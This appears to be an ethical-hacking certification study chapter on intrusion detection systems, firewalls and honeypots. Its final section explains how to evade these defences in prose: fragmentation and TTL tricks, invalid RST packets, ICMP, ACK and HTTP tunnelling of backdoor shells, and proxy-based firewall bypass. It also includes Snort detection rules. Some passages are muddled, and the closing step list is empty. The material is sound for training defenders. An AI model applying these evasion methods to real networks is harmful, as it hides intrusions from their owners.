In this chapter, we will learn about Intrusion Detection Systems, ways to detect an intrusion, and
various types of Intrusion Detection Systems. This chapter focuses on firewalls, types of
firewalls, honeypots, and types of honeypots. This chapter covers firewall evading tools and
firewall and IDS penetration testing.
16.1 Understand Intrusion Detection Systems (IDS)
Exam Focus: Understand Intrusion Detection Systems (IDS). Objective includes:



Understand Intrusion Detection Systems (IDS).
Learn ways to detect an intrusion.
Acquire knowledge on various types of Intrusion Detection Systems.
Intrusion Detection System
An Intrusion Detection System (IDS) is used to detect unauthorized attempts at accessing and
manipulating computer systems locally, through the Internet or through an intranet. It can detect
several types of attacks and malicious behaviors that can compromise the security of a network
and its computers. This includes network attacks against vulnerable services, unauthorized logins
and access to sensitive data, and malware (e.g. viruses, worms, etc.). An IDS also detects attacks
that originate from within a system. In most cases, an IDS has three main components: Sensors,
Console, and Engine. Sensors generate security events. A console is used to alert and control
sensors and to monitor events. An engine is used to record events and to generate security alerts
based on received security events. In many IDS implementations, these three components are
combined into a single device.
The following is the working of an IDS:
Types of IDS
The following are the types of IDS:



Network-based IDS: A Network-based Detection System (NIDS) analyzes data packets
flowing through a network. It can detect malicious packets that are designed to be
overlooked by a firewall's simplistic filtering rules. It is responsible for detecting
anomalous or inappropriate data that may be considered 'unauthorized' on a network. An
NIDS captures and inspects all data traffic, regardless of whether it is permitted for
checking or not.
Host-Based IDS: Host-based IDS (HIDS) is an Intrusion Detection System that runs on
the system to be monitored. HIDS monitors only the data that is directed to or originating
from that particular system on which HIDS is installed. Besides network traffic for
detecting attacks, it can also monitor other parameters of the system such as running
processes, file system access and integrity, and user logins for identifying malicious
activities. BlackICE Defender and Tripwire are good examples of HIDS. Tripwire is an
HIDS tool that automatically calculates the cryptographic hashes of all system files as
well as any other files that a network administrator wants to monitor for modifications. It
then periodically scans all monitored files and recalculates the information to see whether
the files have been modified or not. It raises an alarm if changes are detected.
Log file monitoring: It is generally a program that parses log files after the occurrence of
an event such as failed log in attempts.

File integrity checking: It checks for Trojan horses, or files that have otherwise been
modified, indicating that an intruder has already been there.
Types of IDS responses
The following are the different types of responses generated by an IDS:
1. True Positive: A valid anomaly is detected, and an alarm is generated.
2. True Negative: No anomaly is present, and no alarm is generated.
3. False Positive: No anomaly is present, but an alarm is generated. This is the worst case
scenario. If any IDS generates a false positive response at a high rate, the IDS is ignored
and not used.
4. False Negative: A valid anomaly is present, and no alarm is generated.
IDS detection methods
The following are IDS detection methods:



Statistical Anomaly Detection: The Statistical Anomaly Detection method, also known
as behavior-based detection, compares the current system operating characteristics on
many base-line factors such as CPU utilization, file access activity and disk usages, etc.
In this method, the Intrusion Detection System provides the facility for either a Network
Administrator to make the profiles of authorized activities or place the IDS in learning
mode so that it can learn what is to be added as normal activity. A large amount of time
needs to be dedicated to ascertain whether the IDS is producing few false negatives or
not. Hence, the main drawback of an IDS is that if an attacker slowly changes his
activities over time, the IDS might be fooled into accepting the new behavior.
Pattern Matching Detection: The Pattern Matching IDS, also known as knowledgebased or signature-based IDS, is mainly based on a database of known attacks. These
known attacks are loaded into the IDS as signatures. When this happens, the IDS begins
to guard the network. These signatures are usually given a number or name so that the
network administrator can easily identify the occurring attack. Alerts from this IDS can
be triggered for fragmented IP packets, streams of SYN packets (DoS), or any malformed
Internet Control Message Protocol (ICMP) packets. The main disadvantage of the Pattern
Matching System is that such an IDS can only trigger on signatures that are stored in the
database of the IDS. However, any new or any obfuscated attack performed by an
attacker will be undetected.
Protocol Detection Method: In the Protocol Detection Method, an IDS keeps state
information and can detect abnormal activities of protocols such as IP, TCP, and UDP
protocols. If there is any violation in an incoming protocol rule, the IDS sends an alert
message to the Network Administrator. Such an IDS is usually installed on the Web
server and monitors the communication between a user and the system on which it is
installed.
Ways to detect an intrusion
The following ways are used to detect an intrusion:



Signature recognition: It is also referred to as misuse detection. It tries to recognize
events that misuse a system.
Anomaly detection: It detects the intrusion depending on the fixed behavioral
characteristics of the users and components in a computer system.
Protocol anomaly detection: It involves building of models on TCP/IP protocols using
their specifications.
Indications of intrusions
The following are indications of file system intrusions:






Presence of new, unfamiliar files, or programs
Changes in file permissions
Unexplained changes in the size of the file
Rogue files on the system that do not correspond to the master list of signed files
Unfamiliar file names in directories
Missing files
The following are indications of network intrusions:




Repeated probes of the available services on the machines
Connections from unusual locations
Repeated log in attempts from remote host
Arbitrary data in log files, indicating an attempt of creating either a Denial of Service or a
crash service
The following are indications of system intrusions:








Modifications to system software and configuration files
Gaps in the system accounting
Unusually slow system performance
Crashing or rebooting of system
Short or incomplete logs
Missing logs or logs with incorrect permissions or ownership
Unfamiliar processes
Unusual graphic displays or test messages
Snort
Snort is an open source network intrusion prevention and detection system that operates as a
network sniffer. It logs activities of the network that is matched with the predefined signatures.
Signatures can be designed for a wide range of traffic, including Internet Protocol (IP),
Transmission Control Protocol (TCP), User Datagram Protocol (UDP), and Internet Control
Message Protocol (ICMP).
The three main modes in which snort can be configured are as follows:



Sniffer mode: It reads the packets of the network and displays them in a continuous
stream on the console.
Packet logger mode: It logs the packets to the disk.
Network intrusion detection mode: It is the most complex and configurable
configuration, allowing snort to analyze network traffic for matches against a userdefined rule set.
Working of snort
The following image shows the working of snort:
Decoder performs the following functions:



It saves the captured packets into heap.
It identifies link level protocols.
It decodes IP.
Detection Engine matches packet against rules previously charged into memory since snort
initialization. Output Plug-ins format the notifications for a user so that the user can access them
in different ways.
Snort rules
Snort's rule engine enables a user to write rules in order to meet the requirements of the network.
Snort rules are useful in differentiating between normal Internet activities and malicious
activities. Snort rules must be included on a single line. Rules on multiple lines are not handled
by the snort rule parser. Rule header and rule options are two logical parts of snort rules. Rule
header identifies rule's actions such as alerts, log, pass, activate, dynamic, etc. Rule options
identifies rule's alert messages.
Rule action: The rule header stores the complete information of a packet and finds the action
that is to be carried out and what rule to be applied. When the rule action finds a packet that
matches the rule criteria, it alerts snort. The following actions are available in snort:
1. Alert: The selected alert method is used to generate an alert.
2. Log: The packet is logged.
3. Pass: The packet is dropped.
IP protocols: TCP, UDP, and ICMP are available IP protocols that that are supported by snort for
suspicious behavior.
Direction operator: It indicates the direction of the traffic. The traffic can flow either in one
direction or bi-directionally. The following is an example of snort rules using the bidirectional
operator:
log !192.168.1.0/24 any <> 192.168.1.0/24 23
IP addresses: The "any" keyword is used to identify any IP address. Addresses that are formed
by straight numeric IP address is accepted by snort. Netmask is applied to the rule's address and
to incoming packets that are verified against the rule by a CIDR block.
Port numbers: Port numbers can be listed in various ways, including "any" ports, static port
definitions, ranges, and by negation. The range operator ":" is used to indicate port ranges. The
following is an example of Port Negation:
log tcp any any -> 192.168.1.0/24 !6000:6010
Tipping Point
Tipping Point IPS is an inline device. It is placed seamlessly and transparently into the network.
Each packet is thoroughly inspected in order to determine whether they are malicious or
legitimate. It delivers performance, application, and infrastructure protection at gigabit speeds
via total packet inspection.
Intrusion detection tools
The following are intrusion detection tools:
















Security Network Intrusion Prevention System
Strata Guard
Peek & Spy
CRCMd5 Data Validation
Cisco IDS 4250 Appliance
DiskSearch 32
INTOUCH INSA-Network Security Agent
IDP8200
OSSEC
AIDE (Advanced Intrusion Detection Environment
Netifera
Tripwire
eXpert-BSM
SNARE (System iNtrusion Analysis & Reporting Environment)
Cisco Intrusion Detection
Vanguard Enforcer
Tripwire
Tripwire is a System Integrity Verifier (SIV) that is used to monitor files and detect changes
made by an intruder. The tripwire utility can be used to check the file size, the file signature, and
the integrity of a file. Tripwire is a tool that automatically calculates the cryptographic hashes of
all system files as well as any other file that a network administrator wants to monitor for
modifications. It then periodically scans all monitored files and recalculates the information to
see whether the files have been modified or not. It raises an alarm if changes are detected.
BlackICE Defender
BlackICE Defender is a Host-Based Intrusion Detection System (HIDS). It provides a firewall
that detects, reports, and blocks all suspected access attempts. It provides a notification by
flashing tray icons when any intrusion is detected. It also provides detailed information regarding
the different types of attacks that can harm the security of the network.
IPS
Intrusion Prevention System (IPS) is a tool that is used to prevent sophisticated attacks on the
network. The IPS tool detects such attacks by keeping an eye on the trends, looking for attacks
that use particular patterns of messages, and other factors. The IPS tools sit in the packet's
forwarding path and then rate and report each potential threat by analyzing the traffic. The IPS
tool has the ability to react and filter the traffic. There are two types of IPS:


Anti-x
Host intrusion prevention system (HIPS)
Network intrusion prevention system (NIPS)
Anti-x is a component of Cisco Adaptive Security Appliance (ASA). Anti-x provides in-depth
security design that prevents various types of problems such as viruses. The security provided by
the tool includes the following:






Anti-virus: It scans network traffic and prevents the transmission of known viruses. It
detects viruses through their virus signatures.
Anti-spyware: It scans network traffic and prevents the transmission of spyware
programs. As spyware does a lot of damage, this tool becomes very critical for any
organization. Spyware eats a lot of precious bandwidth too.
Anti-spam: It deletes and segregates all junk e-mails before forwarding them to users. It
examines all e-mails that arrive in the network.
Anti-phishing: It prevents phishing attacks from reaching network users.
URL filtering: It filters Web traffic based on URL to prevent users from connecting to
inappropriate sites.
E-mail filtering: Apart from providing anti-spamming feature, it also filters e-mails
containing offensive material, potentially protecting an organization from lawsuits.
Cisco ASA appliance can be configured for network-based role for all functions of Anti-x.
16.2 Understand what is a firewall, types of firewalls, and identify firewall identification
techniques
Exam Focus: Understand what is a firewall, types of firewalls, and identify firewall identification
techniques. Objective includes:



Understand what is a firewall.
Types of firewalls.
Identify firewall identification techniques.
Firewall
A firewall is a combination of software and hardware that prevents data packets from coming in
or going out of a specified network or computer. It is used to separate an internal network from
the Internet. It analyzes all the traffic between a network and the Internet, and provides
centralized access control on how users should use the network. A firewall can also perform the
following functions:





Block unwanted traffic.
Direct the incoming traffic to more trustworthy internal computers.
Hide vulnerable computers that are exposed to the Internet.
Log traffic to and from the private network.
Hide information, such as computer names, network topology, network device types, and
internal user IDs from external users.
The firewall is placed at the junction point or gateway between the two networks. It may be
concerned with the type of traffic or with the source or destination addresses and ports.
The firewall architecture includes bastion host, screened subnet, and multi-homed firewall.
Bastion host
A bastion host is a computer that must be made secure because it is accessible from the Internet,
and hence is more vulnerable to attacks. A bastion host is placed at the protected network's point
of penetration, often in front of the screening router. It provides security to an internal network
against unauthorized access and misuse.
Screened subnet
A screened subnet is a firewall architecture that offers additional advantages over the bastion
host architecture. This architecture uses a single firewall with three network cards (commonly
referred to as a triple homed firewall). An example of this topology is shown in the figure below:
The screened subnet provides a solution that allows organizations to offer services securely to
Internet users. Any servers that host public services are placed in the Demilitarized Zone (DMZ),
which is separated from both the Internet and the trusted network by a firewall. Therefore, if a
malicious user does manage to compromise the firewall, he does not have access to the Intranet
(providing that the firewall is properly configured).
Multi-homed firewall
In a multi-homed firewall, more than three interfaces are available that permit further subdivision
of system on the basis of specific security objectives of an organization.
Demilitarized zone
A demilitarized zone (DMZ) is a physical or logical subnetwork that contains and exposes
external services of an organization to a larger network, usually the Internet. The purpose of a
DMZ is to add an additional layer of security to an organization's Local Area Network (LAN);
an external attacker only has access to equipment in the DMZ, rather than the whole of the
network. Hosts in the DMZ have limited connectivity to specific hosts in the internal network,
though communication with other hosts in the DMZ and to the external network is allowed. This
allows hosts in the DMZ to provide services to both the internal and external networks, while an
intervening firewall controls the traffic between the DMZ servers and the internal network
clients. In a DMZ configuration, most computers on the LAN run behind a firewall connected to
a public network such as the Internet.
Types of firewalls
The following are the types of firewalls:

Packet filtering firewall: Packet filtering firewalls work on the first three layers of the
OSI reference model, which means that all the work is done between the network and
physical layers. When a packet originates from the sender and filters through a firewall,
the device checks for matches to any of the packet filtering rules that are configured in
the firewall and drops or rejects the packet accordingly. In a software firewall, packet
filtering is done by a program called a packet filter. The packet filter examines the header
of each packet based on a specific set of rules, and on that basis, decides to prevent it
from passing (called DROP) or allow it to pass (called ACCEPT). A packet filter passes
or blocks packets at a network interface based on source and destination addresses, ports,
or protocols. The process is used in conjunction with packet mangling and Network
Address Translation (NAT). Packet filtering is often part of a firewall program for
protecting a local network from unwanted intrusion. This type of firewall can be best
used for network perimeter security.

Circuit-level gateway firewall: Circuit-level gateways work at the session layer of the
OSI model or the TCP layer of the TCP/IP. They determine whether a requested session
is legitimate or not by monitoring TCP handshaking between packets. Information passed
to a remote computer via a circuit level gateway appears to have originated from the
gateway. Circuit-level gateways hide information regarding the private network that they
protect. They do not filter individual packets.

Application-level firewall: Application-level gateways can filter packets at the
application layer of the OSI model. Services for which there is no proxy cannot be
accessed by incoming or outgoing packets. Any FTP, gopher, telnet, or other traffic will
not be allowed by an application-level gateway that is configured as a Web proxy. The
application-level gateway can filter application specific commands, such as http:post and
get, as it examines packets at the application layer.

Stateful multilayer inspection firewall: The stateful multilayer inspection firewall
combines the aspects of the other three types of firewalls. It filters packets at the network
layer in order to find whether session packets are legitimate and evaluate the contents of
packets at the application layer.
Firewall identification techniques
The following are firewall identification techniques:


Port scanning: An attacker uses port scanning to determine ports that are available. Port
scanning involves sending a message to each port, one at a time. Whether the port is used
or not can be indicated by the kind of response received, and the port can therefore be
probed for weakness. Simple port scans can be used by some firewalls to uniquely
identify themselves.
Banner grabbing: Banner grabbing is an enumeration technique used to glean
information about computer systems on a network and the services running its open ports.
Administrators can use this to take inventory of the systems and services on their
network. An intruder however can use banner grabbing in order to find network hosts that
are running versions of applications and operating systems with known exploits. Some
examples of service ports used for banner grabbing are those used by Hyper Text
Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer
Protocol (SMTP); ports 80, 21, and 25, respectively. Tools commonly used to perform
banner grabbing are Telnet, which is included with most operating systems, and Netcat.
Banner grabbing is a simple method of OS detection. It is useful in detecting services run
by firewalls. FTP, telnet, and Web servers are three main services which send out
banners. The following is an example of SMTP banner grabbing:
telnetmail.targetcompany.org 25

Firewalking: Firewalking is a technique for gathering information about a remote
network protected by a firewall. This technique can be used effectively to perform
information gathering attacks. In this technique, an attacker sends a crafted packet with a
TTL value that is set to expiration one hop past the firewall. If the firewall allows this
crafted packet through, it forwards the packet to the next hop. On the next hop, the packet
expires and elicits an ICMP "TTL expired in transit" message to the attacker. If the
firewall does not allow the traffic, there should be no response, or an ICMP
"administratively prohibited" message should be returned to the attacker. A malicious
attacker can use firewalking to determine the types of ports/protocols that can bypass the
firewall. To use firewalking, the attacker needs the IP address of the last known gateway
before the firewall and the IP address of a host located behind the firewall. The main
drawback of this technique is that if an administrator blocks ICMP packets from leaving
the network, it is ineffective.
Some important firewalls
The following are some important firewalls:










Check Point Firewall Software
eScan Enterprise
Jetico Personal Firewall
ZoneAlarm Pro
Novell BorderManager
FireWall-1
Jetico Personal Firewall
InstaGate
ZoneAlarm Pro
AccessMaster NetWall
16.3 Understand honeypot
Exam Focus: Understand a honeypot. Objective includes:



Understand a honeypot.
Assess various types of honeypots.
Understand how to set up a honeypot.
Honeypot
A honeypot is a computer that is used to attract potential intruders or attackers. It is for this
reason that a honeypot has low security permissions. A honeypot is used to gain information
about the intruders and their attack strategies.
Types of honeypots
The following are the types of honeypots:


Low-interaction honeypot: It emulates services and programs that would be found on an
individual's system. The honeypot will simply generate an error if the attacker does
something that the emulation does not expect. The low-interaction honeypot captures
limited amount of information.
High-interaction honeypot: It offers a vast amount of information about attackers. It
provides an attacker access to the real operating system without any restriction. A highinteraction honeypot is a powerful weapon that provides opportunities to discover new
tools, to identify new vulnerabilities in the operating system, and to learn how blackhats
communicate with one another.
Advantages and disadvantages of honeypots
Honeypots have several advantages, which are as follows:




Small set of data: Honeypots collect small amounts of data, but almost all of this data is
about real attacks or unauthorized activity.
Reduced false positives: Honeypots almost detect or capture attacks or unauthorized
activities that reduce false positives.
False negatives: Honeypots detect and record any unseen or unnoticed attacks or
behavior.
Cost effective: Honeypots only interact with malicious activity. So there is no need for
high performance resources.
Honeypots also have some disadvantages, which are as follows:


Limited View: Honeypots can only see activities that interact with them. They cannot
see or capture any attacks directed against existing systems.
Discovery and Fingerprinting: Honeypots can be easily detected and fingerprinted by
several tools.

Risk of takeover: Since there are many security holes in honeypots, a malicious attacker
can take over the honeypot and can use it to gain access and hack other networks.
Set up a honeypot
Take the following steps to set up a honeypot:
1. Download or purchase honeypot software. The following are some of the programs
available for Linux systems:
o Tiny Honeypot
o LaBrea
o Honeyd
KFSensor is software that operates with Windows.
2. Install a honeypot onto the computer by logging in as an administrator on the computer.
3. Install the software on the computer. Select the "Full Version" to ensure that every
feature of the program is installed.
4. Place the honeypot software in the "Program Files" folder. Once you have chosen the
folder, click "OK". The program will install.
5. Restart the computer for the honeypot to work.
6. Check the items that you want the honeypot to look for, including services, applications
and Trojans, and name your domain by configuring the honeypot.
Honeypot tools
The following are honeypot tools:








NetBait
Single-honeypot
LaBrea Tarpit
Kojoney
Sendmail SPAM Trap
HoneyBOT
PatriotBox
Google Hack Honeypot
KFSensor
KFSensor is a Windows-based honeypot Intrusion Detection System (IDS). It acts as a honeypot
to attract and log potential hackers by simulating vulnerable system services and Trojans. It has
highly configurable features of detailed logging, analysis of attack, and security alerts. When
using the KFSensor, a user can create different types of scenarios, such as what action should be
taken when access to a honeypot is attempted. KFSensor contains many innovative and unique
features, such as remote management, a Snort compatible signature engine, and emulations of
real servers (e.g. FTP, POP3, HTTP, Telnet and SMTP) to deceive the hacker and gain more
valuable information about his motives. The following are features of KFSensor:






GUI based management console
Remote management
Snort compatible signature engine
Emulations of Windows networking protocols
Export logs in multiple formats
Denial of Service attack protection
Specter
Specter is a commercial honeypot-based intrusion detection system. Specter is developed and
sold by the Swiss company Netsec. It is used to lure hackers away from the production machines
by simulating a vulnerable computer to an interesting target. It offers common Internet services
such as SMTP, FTP, POP3, HTTP, and TELNET. These services appear perfectly normal to the
attackers; however, in reality, these services are traps for the attackers to mess around and leave
traces, without even knowing that they are connected to a decoy system.
A Specter system consists of a dedicated PC and the Specter software that is connected to the
network where attacks are expected to occur. It can also be installed on internal networks to find
suspicious activities within an organization. It is designed for commercial organizations,
including small and large enterprises.
16.4 Examine evading IDS, understand evading firewalls, and learn detecting honeypots
Exam Focus: Examine evading IDS, understand evading firewalls, and learn detecting
honeypots. Objective includes:



Examine evading IDS.
Understand evading firewalls.
Learn detecting honeypots.
Evasion attack
An evasion attack is one in which an IDS rejects a malicious packet but the host computer
accepts it. Since the IDS has rejected it, it does not check the contents of the packet. Hence,
using this technique, an attacker can exploit the host computer. In many cases, it is quite simple
for an attacker to send such data packets that can easily perform evasion attacks on IDSs. The
attacker sends portions of the request in packets that are mistakenly rejected by the IDS. This
allows the removal of parts of the stream from the ID system's view. For example, the IDS
cannot detect the attack if the malicious sequence is sent byte-by-byte and one byte is rejected by
the IDS.
Denial of Service attack
Central logging servers are employed by many IDSs. Central logging servers are used
exclusively for storing IDS alert logs. The central server is used to centralize alert data; hence, it
can be viewed as a whole rather than on a system-by-system basis. Attackers can slow the central
server down or even crash it using a DoS attack if they know the central log server's IP address.
Attacks can go unnoticed after the server is shut down as the alert data is no longer being used.
An attacker can do the following using this evasion technique:





Cause the device to lock up.
Cause a personnel to be unable to investigate all the alarms.
Consume the device's processing power and permit attacks to sneak by.
Fill up disk space causing attacks to not be logged.
Cause more alarms that management systems can handle.
Obfuscating
An IDS can be evaded by obfuscating or encoding the attack payload in a way that the target
computer will reverse but the IDS will not. In the past, an adversary using the Unicode character
could encode attack packets that an IDS would not recognize but that an IIS Web server would
decode and become attacked. Polymorphic code is another means to circumvent signature-based
IDSs by creating unique attack patterns, so that the attack does not have a single detectable
signature. Attacks on encrypted protocols such as HTTPS are obfuscated if the attack is
encrypted.
Session splicing IDS evasion technique
In the session splicing IDS evasion technique, an attacker delivers data in multiple small sized
packets. Hence, it becomes very difficult for an IDS to detect the attack signatures of such
attacks. For example, consider the following snort signature for detecting session splicing:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-MISC whisker splice
attack"; content: "|20|"; flags: A+; dsize: 1;reference:arachnids,296;
classtype:attempted-recon; sid:1104; rev:1;)
This rule detects traffic destined to port 80 with the ack flag set, a space (hex 20) in the payload,
and a dsize of 1. Although this signature accurately detects session splicing, this method can be
modified to evade the IDS. To evade this rule, an attacker can send abnormally small packets.
For example, an attacker can send very small sized packets with durations of 15 minutes per
packet to the IIS Web server. Since an IIS session remains alive for a long time, the IDS may be
tricked into accepting them as regular packet transformations.
Fragmentation overlap IDS evasion method
In this approach, an attacker sends packets in such a manner that one packet fragment overlaps
data from a previous fragment. The information is organized in the packets in such a manner that
when the victim's computer reassembles the packets, an attack string is executed on the victim's
computer. Since the attacking string is in a fragmented form, the IDS is unable to detect it.
Fragmentation overwrite IDS evasion method
In this approach, an attacker sends packets in such a manner that one packet fragment overwrites
data from a previous fragment. The information is organized into packets in such a manner that
when the victim's computer reassembles the packets, an attack string is executed on the victim's
computer. Since the attacking string is in a fragmented form, the IDS becomes unable to detect
it.
Unicode evasion technique
Unicode is a character representation that gives each character a unique identifier for each
written language. This facilitates the uniform computer representation of each language. There
can be multiple representations of a single character; hence, Unicode is problematic for the IDS
technology. For example, "\" can be represented as 5C, C19C and E0819C, this makes writing
pattern matching signatures very difficult.
Fragmentation attack
The fragmentation reassembly timeout of the victim is more than the IDS fragmentation
reassembly timeout. Suppose 15 seconds is the IDS fragmentation reassembly timeout and the
system is monitoring Linux hosts. Linux hosts have a default fragmentation reassembly timeout
of 30 seconds. The attacker can send the second fragment with a delay of 15 seconds but still
within 30 seconds after sending the first fragment. Now, the victim reassembles the fragments.
At the IDS, the fragmentation reassembly timeout parameter kicks in and a timeout takes place.
As the IDS has already lost the first fragment due to time out, the second fragment received by
the IDS will be dropped. Hence, the victim will reassemble the fragments and will be attacked,
whereas the IDS will not make any noise or produce alerts.
IP address spoofing
The attacker can use IP address spoofing to gain an unauthorized access to a computer or
network. In this attack, the attacker spoofs the IP address of the machine and makes it appear that
the messages are coming from a trusted machine. The attacker modifies the address information
in the IP packet header and the source address bit field in order to bypass the firewall.
Suppose there are three hosts named HostA, HostB, and HostC. HostC is a trusted machine of
HostB. HostA wants to send some packets to HostB. HostA changes the IP addresses of these
packets to impersonate itself to be HostC. HostB thinks that these packets are sent from HostC,
but in reality they are sent from HostA.
Time-to-live attacks
In time-to-live attacks, an attacker is required to have a prior knowledge of the topology of the
victim's network. Tools such as traceroute can be used to obtain this information. A traceroute
gives information on the number of routers between the attacker and the victim. The attacker is
assumed to have the prior information of the router present between the IDS and the victim. He
breaks the information into three fragments. The attacker sends fragment 1 with a large TTL
value and both the IDS and the victim receives fragment 1 with a large TTL value. The attacker
then sends second fragment with TTL value of 1 and false payload. The IDS receives this
fragment. As the TTL value is now reduced to zero, the router discards the fragment. Now, the
IDS has only fragment 2 as it has already performed a reassembly and the stream has been
flushed. The attacker finally sends the second fragment with a valid payload. The victim
performs a reassembly on fragments (1,2, 3) and gets the attack. The attacker then sends
fragment 3 with a valid TTL. This makes the IDS perform a TCP-reassembly on fragments (1, 2',
3). The victim will still wait for the second fragment.
Invalid RST packets
Checksums are used by the TCP protocol in order to ensure that there is reliable communication.
To every transmitted segment, a checksum is added, and at the receiving end, the checksum is
checked. The packet is dropped at the receiving end when the checksum differs from the
checksum that the receiving host expects. To end two-way communication, the TCP protocol
also uses an RST packet. Attackers can use invalid RST packets to elude detection by sending
RST packets with an invalid checksum. Sending RST packets with an invalid checksum causes
the IDS to stop processing the stream as the IDS thinks that the communication session has
ended. However, the end host sees this packet and drops the packet if it is invalid after verifying
the checksum value. Some IDS systems may stop reassembling the communication as they
interpret this packet as an actual termination of the communication.
Urgency flag
The urgency flag is used within the TCP protocol for marking data as urgent. TCP uses an
urgency pointer. The urgency pointer points to the beginning of urgent data within a packet.
When the urgency flag is set, the following occurs:


All data before the urgency pointer is ignored.
The data to which the urgency pointer points is processed
Attackers can place garbage data before the urgency pointer, and the IDS reads that data without
considering the end host's urgency flag handling. This implies that the IDS has more data than
can be actually processed by the end host. Attackers can evade IDSs when IDSs do not take into
account the TCP protocol's urgency feature.
ASCII shellcode
ASCII shellcode includes only characters contained within the ASCII standard. It allows
attackers to bypass commonly enforced character restrictions within string input code. Attackers
also use ASCII shellcode to bypass IDS pattern matching signatures as strings are hidden within
the shellcode in a similar fashion to polymorphic shellcode. As all assembly instructions cannot
be converted directly to ASCII values, using ASCCI for shellcode limits what the shellcode can
do under some circumstances. Other instructions or a combination of instructions that convert to
ASCI character representation can be used to bypass this restriction.
Application-layer attack
Some form of compression is employed in many applications that deal with media such as
images, video, and audio to send an application in a form much smaller than the original. This
increases data transfer speed. The entire attack can take place within compressed data and the
IDS will have no way to check the compressed file format for signatures when a flaw is found in
these applications. Many IDSs look for particular conditions that lead to an attack. There are
times when many different forms can be taken by the attack. For example, several different
integer values can be used to exploit integer overflow vulnerabilities.
Desynchronization - pre connection SYN
The desynchronization - pre connection SYN attack calls bind in order to get the kernel to assign
a local port to the socket before calling connect. In this attack, an initial SYN is sent before the
real connection with an invalid TCP checksum. This attack will synchronize the sniffer/IDS to a
bogus sequence number before the real connection takes place if the sniffer ignores subsequent
SYNs in a connection and does not check the TCP checksum.
Desynchronization - post connection SYN
In desynchronization - post connection SYN, the IDS should be tried to be desynchronized from
the actual sequence numbers that the kernel is honoring. A post connection SYN packet should
be sent in the data stream, which will have divergent sequence numbers, but otherwise meet all
the important criteria to be accepted by the target. As this SYN packet references an already
established connection, the target host will ignore this SYN packet.
The desynchronization - post connection SYN attack has the aim to get the IDS to resynchronize
its notion of the sequence numbers to the new SYN packet. As it will be awaiting a different
sequence number, it will then ignore the data that is legitimate part of the original stream. An
RST packet should be sent with the new sequence number and close down its notion of the
connection once succeeded in resynchronizing the IDS with a SYN packet.
Encryption
The most effective evasion attack occurs when the attacker has already established an encrypted
session with the victim.
Flooding
The true attack traffic may go undetected when the attacker sends loads of unnecessary traffic to
produce noise and if the IDS does not analyze the noise traffic.
Session token generation
The sender of the packets uses the session token generation mechanism to designate the route
that a packet should take through the network. Each router will check the IP address of the
designation and select the next node to forward the packets when the packets travel through the
nodes in the network. Source routing allows a sender of a packet to partially or completely
specify the route the packet takes through the network.
Tiny fragment
The tiny fragment attack involves sending an IP packet with the first fragment so small that it
includes only the source and destination port information for TCP, not the TCP flags. The first
fragment cannot be tested for this information if the access lists are established to drop or permit
packets on the basis of TCP flags.
As most network devices do not perform reassembly of packets that pass through them, they do
not check the rest fragments and allow them to pass through. In this way, an attacker can get an
illegitimate packet through to an end host using these devices.
Bypass blocked sites using the IP address in place of URL
Bypass blocked sites using the IP address in place of URL involves typing the IP address directly
in browser's address bar instead of typing the blocked Website's domain name. For example,
instead of typing www.facebook.com, type its IP address to access Facebook. Host2ip can be
used to determine the IP address of that blocked Website. This method cannot be used to unblock
or access the Website if the blocking software can track the IP address sent to the Web server.
Bypass blocked sites using anonymous Website surfing sites
Many Websites around the net enables a user to surf the Internet anonymously. Some Websites
have options for encrypting the URLs of the Websites. The proxy Websites will show another IP
address and hide the actual IP address. All proxy sites maintain a list of currently active proxy
sites which enable users to browse the Web anonymously. This can prevent the Website from
being blocked, thus permitting access to users.
Proxy servers useful in unblocking the blocked Websites
The following are some proxy servers that are useful in unblocking the blocked Websites:








http://www.anonymizer.com
http://anonymouse.com
http://proxify.com
http://bumsk.com
http://dailybestlinks.com
http://www.spysurfing.com
http://alienproxy.com
http://indianproxy.com
Bypass a firewall using a proxy server
The following steps should be taken to bypass a firewall using a proxy server:
1. Find an appropriate proxy server.
2. Go to LAN of Network Connections tab and click the LAN/Network Settings on the
Tools menu of any Internet browser.
3. Select "use a proxy server for LAN" under Proxy server settings.
4. Type the IP address of the proxy server in the Address bar.
5. In the Port box, type the port number that is used by the proxy server for client
connections.
6. Click to select the bypass proxy server for local addresses checkbox if you do not want
the proxy server computer to be used when connected to a computer on the local network.
7. To close the LAN settings dialog box, click OK.
8. To close the Internet Options dialog box, click OK.
Bypassing a firewall through the ICMP tunneling method
Bypassing a firewall through the ICMP tunneling method permits tunneling a backdoor shell in
the data portion of ICMP echo packets. RFC 792 delineates ICMP operation. It does not specify
what should go in the data portion. The payload portion is arbitrary. Most firewalls do not
examine the payload option. Hence, any data can be inserted in the payload portion of the ICMP
packet, including a backdoor application. Keeping ICMP open on firewalls is useful for tools
such as ping and traceroute. Loki ICMP tunneling is used to execute commands of choice when
it is assumed that ICMP is allowed through a firewall. Loki ICMP executes commands of choice
by tunneling them inside the payload of ICMP echo packets.
Bypassing a firewall through the ACK tunneling method
Bypassing a firewall through the ACK tunneling method permits a backdoor application with
TCP packets with the ACK bit set. The ACK bit is used for acknowledging the receipt of a
packet. As ACK bits are supposed to be used in response to legitimate traffic that is already
being allowed through, some firewalls do not check packets with the ACK bit set. ACK
tunneling can be implemented using tools such as AckCmd.
Bypassing a firewall through the HTTP tunneling method
Bypassing a firewall through the HTTP tunneling method can be implemented if the target
company has a public Web server with port 80 used for HTTP traffic that is unfiltered on its
firewall. The payload of an HTTP packet is not examined by many firewalls in order to confirm
that it is legitimate HTTP traffic. Hence, traffic can be tunneled inside TCP port 80 as it is
already allowed. This technique of tunneling traffic across TCP port 80 is used by tools such as
HTTPTunnel. HTTPTunnel is a client/server application. The client application is known as htc.
The server is hts. The server should be uploaded onto the target system and it should be told
which port is redirected through TCP port 80.
Bypassing a firewall through external systems
Bypassing a firewall through external systems includes the following steps:
1. A legitimate user works with some external systems in order to access the corporate
network.
2. An attacker steals the session ID and cookies after sniffing the network traffic.
3. The attacker accesses the corporate network by bypassing the firewall and gets Windows
ID of the running Netscape 4.x/Mozilla process on the user's system.
4. The attacker issues an openURL() command to the found window.
5. User's Web browser connects with the WWW server of the attackers.
6. The attacker inserts malicious payload into the requested Web page. Hence, code of the
attacker gets executed on the user's machine.
Bypassing a firewall through the MITM attack
Bypassing a firewall through the MITM attack includes the following steps:
1.
2.
3.
4.
5.
6.
An attacker performs DNS server poisoning.
User 1 requests for www.ucertify.com to the corporate DNS server.
The corporate DNS server sends the IP address of the attacker.
User 1 accesses the attacker's malicious server.
